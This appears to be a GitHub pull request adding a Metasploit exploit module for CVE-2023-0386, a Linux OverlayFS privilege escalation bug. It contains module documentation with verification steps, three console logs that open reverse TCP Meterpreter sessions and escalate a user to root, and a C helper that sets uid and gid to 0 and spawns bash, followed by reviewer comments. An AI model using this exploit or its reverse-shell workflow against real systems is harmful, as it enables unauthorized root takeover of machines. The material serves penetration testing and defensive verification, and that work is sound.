Add module: Linux Priv Esc (OverlayFS copying bug) CVE-2023-0386 #19441
There are no files selected for viewing
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,152 @@ | ||
| ## Vulnerable Application | ||
|
|
||
| This exploit targets the Linux kernel bug in OverlayFS. | ||
|
|
||
| A flaw was found in the Linux kernel, where unauthorized access to the execution of the setuid file with capabilities | ||
| was found in the Linux kernel’s OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. | ||
| This uid mapping bug allows a local user to escalate their privileges on the system. | ||
|
|
||
| The vulnerability affects: | ||
|
|
||
| * Linux kernel from (including) 5.11 up to (excluding) 5.15.91 and from (including) 5.16 Up to (excluding) 6.1.9 | ||
|
|
||
| This module was successfully tested on: | ||
|
|
||
| * Ubuntu kernel version 5.13.0-1021-oem on x64/amd64 | ||
|
|
||
| ### Install | ||
|
|
||
| 1. Install Ubuntu version 22.04 LTS | ||
| 2. (Optional) Change kernel version | ||
| ``` | ||
| sudo apt update | ||
| sudo apt install -y linux-image-5.13.0-1021-oem linux-headers-5.13.0-1021-oem | ||
| reboot | ||
| ``` | ||
| 3. Install the required libraries | ||
| ``` | ||
| sudo apt update | ||
| sudo apt install -y gcc cmake fuse libfuse-dev libcap-dev | ||
| ``` | ||
|
|
||
| ## Verification Steps | ||
|
|
||
| 1. Make an Ubuntu | ||
| 2. Create a meterpreter or shell payload and upload it to the Ubuntu target | ||
| 3. Set up a handler for the payload | ||
| 4. Launch the payload as a regular user on the Ubuntu target and connect the handler | ||
| 5. Do: `use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc` | ||
| 6. Do: `run session=<session> lhost=<lhost>` | ||
| 7. You should get a root | ||
|
|
||
| ## Options | ||
|
|
||
| ### COMPILE (required) | ||
|
|
||
| [Auto|True|False] This selects the binary to use. True will upload the source code and perform | ||
| compilation on target, False will upload a precompiled binary. AUTO will favor compiling on target | ||
| but will fall back to the precompiled option if a compiler cannot be found. | ||
| The default value is `Auto` | ||
|
|
||
| ### WritableDir (required) | ||
| This indicates the location where you would like the payload and exploit binary stored, as well | ||
| as serving as a location to store the various files and directories created by the exploit itself. | ||
| The default value is `/tmp` | ||
|
|
||
| ## Scenarios | ||
| ### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=Auto | ||
| ``` | ||
| msf6 > use exploit/multi/handler | ||
| [*] Using configured payload generic/shell_reverse_tcp | ||
| msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp | ||
|
|
||
| [*] Started reverse TCP handler on 192.168.56.1:4444 | ||
| [*] Sending stage (3045380 bytes) to 192.168.56.102 | ||
| [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54776) at 2024-09-05 22:48:42 +0900 | ||
|
|
||
| meterpreter > getuid | ||
| Server username: ubu | ||
| meterpreter > background | ||
| [*] Backgrounding session 1... | ||
| msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc | ||
| [*] Using configured payload linux/x64/meterpreter/reverse_tcp | ||
| msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=Auto | ||
|
|
||
| [*] Started reverse TCP handler on 192.168.56.1:4444 | ||
| [*] Running automatic check ("set AutoCheck false" to disable) | ||
| [+] The target appears to be vulnerable. Linux kernel version found: 5.13.0 | ||
| [*] Writing '/tmp/.a4HSc5ks' (334 bytes) ... | ||
| [*] Launching exploit... | ||
| [*] Sending stage (3045380 bytes) to 192.168.56.102 | ||
| [+] Deleted /tmp/.a4HSc5ks | ||
| [+] Deleted /tmp/.Smx0d11hH | ||
| [*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54778) at 2024-09-05 22:49:28 +0900 | ||
|
|
||
| meterpreter > getuid | ||
| Server username: root | ||
| ``` | ||
|
|
||
| ### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=True | ||
| ``` | ||
| msf6 > use exploit/multi/handler | ||
| [*] Using configured payload generic/shell_reverse_tcp | ||
| msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp | ||
|
|
||
| [*] Started reverse TCP handler on 192.168.56.1:4444 | ||
| [*] Sending stage (3045380 bytes) to 192.168.56.102 | ||
| [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54710) at 2024-09-05 22:45:40 +0900 | ||
|
|
||
| meterpreter > getuid | ||
| Server username: ubu | ||
| meterpreter > background | ||
| [*] Backgrounding session 1... | ||
| msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc | ||
| [*] Using configured payload linux/x64/meterpreter/reverse_tcp | ||
| msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=True | ||
|
|
||
| [*] Started reverse TCP handler on 192.168.56.1:4444 | ||
| [*] Running automatic check ("set AutoCheck false" to disable) | ||
| [+] The target appears to be vulnerable. Linux kernel version found: 5.13.0 | ||
| [*] Writing '/tmp/.uKkt1jtoJ' (334 bytes) ... | ||
| [*] Launching exploit... | ||
| [*] Sending stage (3045380 bytes) to 192.168.56.102 | ||
| [+] Deleted /tmp/.uKkt1jtoJ | ||
| [+] Deleted /tmp/.oaqii9pj | ||
| [*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54712) at 2024-09-05 22:46:19 +0900 | ||
|
|
||
| meterpreter > getuid | ||
| Server username: root | ||
| ``` | ||
|
|
||
| ### Ubuntu 5.13.0-1021-oem x64/amd64 COMPILE=False | ||
| ``` | ||
| msf6 > use exploit/multi/handler | ||
| [*] Using configured payload generic/shell_reverse_tcp | ||
| msf6 exploit(multi/handler) > run lhost=192.168.56.1 lport=4444 payload=linux/x64/meterpreter/reverse_tcp | ||
|
|
||
| [*] Started reverse TCP handler on 192.168.56.1:4444 | ||
| [*] Sending stage (3045380 bytes) to 192.168.56.102 | ||
| [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:54616) at 2024-09-05 22:36:45 +0900 | ||
|
|
||
| meterpreter > getuid | ||
| Server username: ubu | ||
| meterpreter > background | ||
| [*] Backgrounding session 1... | ||
| msf6 exploit(multi/handler) > use exploit/linux/local/cve_2023_0386_overlayfs_priv_esc | ||
| [*] Using configured payload linux/x64/meterpreter/reverse_tcp | ||
| msf6 exploit(linux/local/cve_2023_0386_overlayfs_priv_esc) > run session=1 lhost=192.168.56.1 COMPILE=False | ||
|
|
||
| [*] Started reverse TCP handler on 192.168.56.1:4444 | ||
| [*] Running automatic check ("set AutoCheck false" to disable) | ||
| [+] The target appears to be vulnerable. Linux kernel version found: 5.13.0 | ||
| [*] Writing '/tmp/.9tZar0/cve-2023-0386' (2215928 bytes) ... | ||
| [*] Writing '/tmp/.Z37h3bkJpw' (334 bytes) ... | ||
| [*] Launching exploit... | ||
| [*] Sending stage (3045380 bytes) to 192.168.56.102 | ||
| [+] Deleted /tmp/.Z37h3bkJpw | ||
| [+] Deleted /tmp/.9tZar0 | ||
| [*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.102:54618) at 2024-09-05 22:37:31 +0900 | ||
|
|
||
| meterpreter > getuid | ||
| Server username: root | ||
| ``` |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,21 @@ | ||
| #define _GNU_SOURCE | ||
| #include <stdio.h> | ||
| #include <stdlib.h> | ||
| #include <unistd.h> | ||
|
|
||
|
|
||
| int main(int argc, char const *argv[]) { | ||
| if (setuid(0) < 0) { | ||
| perror("setuid"); | ||
| return -1; | ||
| } | ||
|
|
||
| if (setgid(0) < 0) { | ||
| perror("setgid"); | ||
| return -1; | ||
| } | ||
|
|
||
| system("/bin/bash"); | ||
|
There was a problem hiding this comment. Could we instead call the binary payload directly here? There was a problem hiding this comment. Thank you! This one (not directly calling payload) is much faster (about a few sec). 8366252 (needs to set setuid and setgid in C code). There was a problem hiding this comment. I think adding the |
||
|
|
||
| return 0; | ||
| } | ||
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You're using setuid and setgid here, but also in the payload?
Since the set commands are supported in the binary payloads, I don't think this is needed unless we're supporting
ARCH_CMDpayloads, and I don't see you using them here?There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
EDIT- I don't think you need this; I think we can directly call the binary payload from within the exploit code itself.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thank you!
cd97b08 does not need setuid and setgid.
Seems like 692531b and 8366252 need setuid and setgid, despite setting in the payload.